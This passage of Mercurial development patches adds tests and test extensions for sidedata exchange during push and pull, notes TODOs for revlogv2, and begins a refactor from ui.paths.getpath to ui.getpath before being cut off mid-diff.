+ +Puller and pulled have sidedata enabled +--------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-target/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg pull -R ../sidedata-target ../sidedata-source + pulling from ../sidedata-source + requesting all changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + new changesets 05da661850d7:7ec8b4049447 + (run 'hg update' to get a working copy) + $ hg -R ../sidedata-target debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00:' + entry-0002 size 32 + '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5' + $ hg -R ../sidedata-target debugsidedata -m 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x81' + entry-0002 size 32 + '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae' + $ hg -R ../sidedata-target debugsidedata a 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata a 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x03' + entry-0002 size 32 + '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80' + $ cd .. 
+ +Now on to asymmetric configs. + +Pusher has sidedata enabled, pushed does not +-------------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=no + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg push -r . ../sidedata-target --traceback + pushing to ../sidedata-target + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + $ hg -R ../sidedata-target log -G + o changeset: 1:7ec8b4049447 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: other + | + o changeset: 0:05da661850d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: initial + + + $ hg -R ../sidedata-target debugsidedata -c 0 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + $ hg -R ../sidedata-target debugsidedata -m 0 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + $ hg -R ../sidedata-target debugsidedata a 0 + $ hg -R ../sidedata-target debugsidedata a 1 -v + $ cd .. 
+ +Pulled has sidedata enabled, puller does not +-------------------------------------------- + + $ rm -rf sidedata-source sidedata-target + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=no + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg pull -R ../sidedata-target ../sidedata-source + pulling from ../sidedata-source + requesting all changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + new changesets 05da661850d7:7ec8b4049447 + (run 'hg update' to get a working copy) + $ hg -R ../sidedata-target log -G + o changeset: 1:7ec8b4049447 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: other + | + o changeset: 0:05da661850d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: initial + + + $ hg -R ../sidedata-target debugsidedata -c 0 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + $ hg -R ../sidedata-target debugsidedata -m 0 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + $ hg -R ../sidedata-target debugsidedata a 0 + $ hg -R ../sidedata-target debugsidedata a 1 -v + $ cd .. 
+ + +Check sidedata exchange with on-the-fly generation and removal +============================================================== + +(Push) Target has strict superset of the source +----------------------------------------------- + + $ hg init source-repo --config format.exp-use-side-data=yes + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +No sidedata is generated in the source + $ hg debugsidedata -c 0 + +Check that sidedata capabilities are advertised + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=1,2 + +We expect the client to abort the push since it's not capable of generating +what the server is asking + $ hg push -r . ../target-repo + pushing to ../target-repo + abort: cannot push: required sidedata category not supported by this client: '1' + [255] + +Add the required capabilities + $ cat << EOF >> .hg/hgrc + > [extensions] + > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py + > EOF + +We expect the target to have sidedata that was generated by the source on push + $ hg push -r . 
../target-repo + pushing to ../target-repo + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + $ cd ../target-repo + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ cd .. + +(Push) Difference is not subset/superset +---------------------------------------- + +Source has one in common, one missing and one more sidedata category with the +target. + + $ rm -rf source-repo target-repo + $ hg init source-repo --config format.exp-use-side-data=yes + $ cat << EOF >> source-repo/.hg/hgrc + > [extensions] + > testsidedata3=$TESTDIR/testlib/ext-sidedata-3.py + > EOF + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata4=$TESTDIR/testlib/ext-sidedata-4.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +Check that sidedata capabilities are advertised + $ hg debugcapabilities . 
| grep sidedata + exp-wanted-sidedata=1,2 + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=2,3 + +Sidedata is generated in the source, but only the right categories (entry-0001 and entry-0002) + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + + +We expect the target to have sidedata that was generated by the source on push, +and also removed the sidedata categories that are not supported by the target. +Namely, we expect entry-0002 (only exchanged) and entry-0003 (generated), +but not entry-0001. + + $ hg push -r . ../target-repo --traceback + pushing to ../target-repo + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + $ cd ../target-repo + $ hg log -G + o changeset: 2:40f977031323 + | tag: tip + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: aa + | + o changeset: 1:2707720c6597 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: b + | + o changeset: 0:7049e48789d7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a + + $ hg debugsidedata -c 0 + 2 sidedata entries + entry-0002 size 32 + entry-0003 size 48 + $ hg debugsidedata -c 1 -v + 2 sidedata entries + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + entry-0003 size 48 + '\x87\xcf\xdfI/\xb5\xed\xeaC\xc1\xf0S\xf3X\x1c\xcc\x00m\xee\xe6#\xc1\xe3\xcaB8Fk\x82e\xfc\xc01\xf6\xb7\xb9\xb3([\xf6D\xa6\xcf\x9b\xea\x11{\x08' + $ hg debugsidedata -m 2 + 2 sidedata entries 
+ entry-0002 size 32 + entry-0003 size 48 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0002 size 32 + entry-0003 size 48 + $ cd .. + +(Pull) Target has strict superset of the source +----------------------------------------------- + + $ rm -rf source-repo target-repo + $ hg init source-repo --config format.exp-use-side-data=yes + $ hg init target-repo --config format.exp-use-side-data=yes + $ cat << EOF >> target-repo/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata.py + > EOF + $ cd source-repo + $ echo aaa > a + $ hg add a + $ hg commit -m a + $ echo aaa > b + $ hg add b + $ hg commit -m b + $ echo xxx >> a + $ hg commit -m aa + +No sidedata is generated in the source + $ hg debugsidedata -c 0 + +Check that sidedata capabilities are advertised + $ hg debugcapabilities ../target-repo | grep sidedata + exp-wanted-sidedata=1,2 + + $ cd ../target-repo + +Add the required capabilities + $ cat << EOF >> .hg/hgrc + > [extensions] + > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py + > EOF + +We expect the target to have sidedata that it generated on-the-fly during pull + $ hg pull -r . ../source-repo --traceback + pulling from ../source-repo + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 2 files + new changesets 7049e48789d7:40f977031323 + (run 'hg update' to get a working copy) + $ hg debugsidedata -c 0 --traceback + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata -c 1 -v --traceback + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x006' + entry-0002 size 32 + '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde' + $ hg debugsidedata -m 2 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg debugsidedata a 1 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ cd .. 
diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-2.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-2.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-2.py @@ -1,6 +1,9 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-2.py - small extension to test (differently) the sidedata logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a client for a complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -10,79 +13,38 @@ import hashlib import struct -from mercurial.node import ( - nullid, - nullrev, -) -from mercurial import ( - extensions, - requirements, - revlog, -) - -from mercurial.upgrade_utils import engine as upgrade_engine - -from mercurial.revlogutils import sidedata +from mercurial.revlogutils import sidedata as sidedatamod -def wrapaddrevision( - orig, self, text, transaction, link, p1, p2, *args, **kwargs -): - if kwargs.get('sidedata') is None: - kwargs['sidedata'] = {} - sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return orig(self, text, transaction, link, p1, p2, *args, **kwargs) +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata -def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs): - text, sd = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text, sd - if self.version & 0xFFFF != 2: - return 
text, sd - if nodeorrev != nullrev and nodeorrev != nullid: - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text, sd +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - -def extsetup(ui): - extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. 
+ for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-3.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-3.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-3.py @@ -1,6 +1,10 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-3.py - small extension to test (differently still) the sidedata +# logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a client for a complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -10,19 +14,38 @@ import hashlib import struct -from mercurial.node import ( - nullid, - nullrev, -) from mercurial import ( extensions, - requirements, revlog, ) -from mercurial.upgrade_utils import engine as upgrade_engine +from mercurial.revlogutils import sidedata as sidedatamod + + +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata + -from mercurial.revlogutils import sidedata +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata + + +def compute_sidedata_3(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha384 = hashlib.sha384(text).digest() + sidedata[sidedatamod.SD_TEST3] = struct.pack('>48s', sha384) + return sidedata def wrapaddrevision( @@ -31,58 +54,35 @@ if kwargs.get('sidedata') is None: kwargs['sidedata'] = {} sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) + sd = compute_sidedata_1(None, self, None, sd, text=text) + kwargs['sidedata'] = compute_sidedata_2(None, self, None, sd, text=text) return orig(self, text, transaction, link, p1, p2, *args, **kwargs) -def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs): - text, sd = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text, sd - if self.version & 0xFFFF != 2: - return text, sd - if nodeorrev != nullrev and nodeorrev != nullid: - if len(text) != struct.unpack('>I', 
sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text, sd - - -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - def extsetup(ui): extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) + + +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. 
+ for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST3, + (sidedatamod.SD_TEST3,), + compute_sidedata_3, + ) + repo.register_wanted_sidedata(sidedatamod.SD_TEST1) + repo.register_wanted_sidedata(sidedatamod.SD_TEST2) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-4.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-4.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-4.py @@ -1,88 +1,19 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-4.py - small extension to test (differently still) the sidedata +# logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a server for a complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
from __future__ import absolute_import -import hashlib -import struct - -from mercurial.node import ( - nullid, - nullrev, -) -from mercurial import ( - extensions, - requirements, - revlog, -) - -from mercurial.upgrade_utils import engine as upgrade_engine - from mercurial.revlogutils import sidedata -def wrapaddrevision( - orig, self, text, transaction, link, p1, p2, *args, **kwargs -): - if kwargs.get('sidedata') is None: - kwargs['sidedata'] = {} - sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return orig(self, text, transaction, link, p1, p2, *args, **kwargs) - - -def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs): - text, sd = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text, sd - if self.version & 0xFFFF != 2: - return text, sd - if nodeorrev != nullrev and nodeorrev != nullid: - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text, sd - - -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] 
= struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - -def extsetup(ui): - extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) +def reposetup(ui, repo): + repo.register_wanted_sidedata(sidedata.SD_TEST2) + repo.register_wanted_sidedata(sidedata.SD_TEST3) diff --git a/tests/testlib/ext-sidedata-5.py b/tests/testlib/ext-sidedata-5.py new file mode 100644 --- /dev/null +++ b/tests/testlib/ext-sidedata-5.py @@ -0,0 +1,81 @@ +# coding: utf8 +# ext-sidedata-5.py - small extension to test (differently still) the sidedata +# logic +# +# Simulates a server for a simple sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> +# +# This software may be used and distributed according to the terms of the +# GNU General Public License version 2 or any later version. + +from __future__ import absolute_import + +import hashlib +import struct + +from mercurial import ( + extensions, + revlog, +) + + +from mercurial.revlogutils import sidedata as sidedatamod + + +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata + + +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata + + +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. 
+ for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) + + # We don't register sidedata computers because we don't care within these + # tests + repo.register_wanted_sidedata(sidedatamod.SD_TEST1) + repo.register_wanted_sidedata(sidedatamod.SD_TEST2) + + +def wrapaddrevision( + orig, self, text, transaction, link, p1, p2, *args, **kwargs +): + if kwargs.get('sidedata') is None: + kwargs['sidedata'] = {} + sd = kwargs['sidedata'] + ## let's store some arbitrary data just for testing + # text length + sd[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + # and sha2 hashes + sha256 = hashlib.sha256(text).digest() + sd[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return orig(self, text, transaction, link, p1, p2, *args, **kwargs) + + +def extsetup(ui): + extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata.py @@ -1,6 +1,6 @@ # ext-sidedata.py - small extension to test the sidedata logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -47,11 +47,12 @@ if self.version & 0xFFFF != 2: return text, sd if nodeorrev != nullrev and nodeorrev != nullid: - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: + cat1 = sd.get(sidedata.SD_TEST1) + if cat1 is not None and len(text) != struct.unpack('>I', cat1)[0]: raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] + expected = sd.get(sidedata.SD_TEST2) got = hashlib.sha256(text).digest() - if got != expected: + if expected is not None and got != expected: raise RuntimeError('sha256 mismatch') return text, sd @@ -86,3 +87,10 @@ extensions.wrapfunction( upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion ) + + +def reposetup(ui, repo): + # We don't register sidedata computers because we don't care within these + # tests + repo.register_wanted_sidedata(sidedata.SD_TEST1) + repo.register_wanted_sidedata(sidedata.SD_TEST2) # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1615802222 -3600 # Mon Mar 15 10:57:02 2021 +0100 # Node ID 0732a72642260a0d86b941efc583e578c8657db4 # Parent ba8e508a8e69284b70c857c616a299887770ef83 configitems: add TODOs blocking the move out of experimental for revlogv2 These are the todos so far, we probably will have more, but we might as well list them while they're fresh in our minds. Differential Revision: https://phab.mercurial-scm.org/D10216 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1297,6 +1297,14 @@ b'use-persistent-nodemap', default=False, ) +# TODO needs to grow a docket file to at least store the last offset of the data +# file when rewriting sidedata. +# Will also need a way of dealing with garbage data if we allow rewriting +# *existing* sidedata. +# Exchange-wise, we will also need to do something more efficient than keeping +# references to the affected revlogs, especially memory-wise when rewriting +# sidedata. +# Also... compress the sidedata? 
(this should be coming very soon) coreconfigitem( b'format', b'exp-revlogv2.2', # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615480009 -3600 # Thu Mar 11 17:26:49 2021 +0100 # Node ID 66fb045521223684373a4b47d88b9a1f6ee5b704 # Parent 0732a72642260a0d86b941efc583e578c8657db4 ui: pass a `ui` object to `paths.getpath` I want to introduce more path's suboption and make it possible to use default value for them. Processing theses sub-options might result in warnings. We need a `ui` object to issue such warnings. To make things simpler, we add an helper method on the `ui` object. Differential Revision: https://phab.mercurial-scm.org/D10162 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -1407,7 +1407,7 @@ opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( b'default repository not configured!', diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -837,7 +837,7 @@ exchange, b'_localphasemove', _phasemove ) # Copy-paste from `push` command - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( _(b'default repository not configured!'), diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4946,7 +4946,7 @@ """ # hg._outgoing() needs to re-resolve the path in order to handle #branch # style URLs, so don't overwrite dest. 
- path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.ConfigError( _(b'default repository not configured!'), @@ -5680,7 +5680,7 @@ # this lets simultaneous -r, -b options continue working opts.setdefault(b'rev', []).append(b"null") - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.ConfigError( _(b'default repository not configured!'), diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1317,7 +1317,7 @@ def _outgoing(ui, repo, dest, opts): - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( _(b'default repository not configured!'), diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1826,9 +1826,9 @@ l and getstring(l[0], _(b"outgoing requires a repository path")) or b'' ) if not dest: - # ui.paths.getpath() explicitly tests for None, not just a boolean + # ui.getpath() explicitly tests for None, not just a boolean dest = None - path = repo.ui.paths.getpath(dest, default=(b'default-push', b'default')) + path = repo.ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.Abort( _(b'default repository not configured!'), diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ 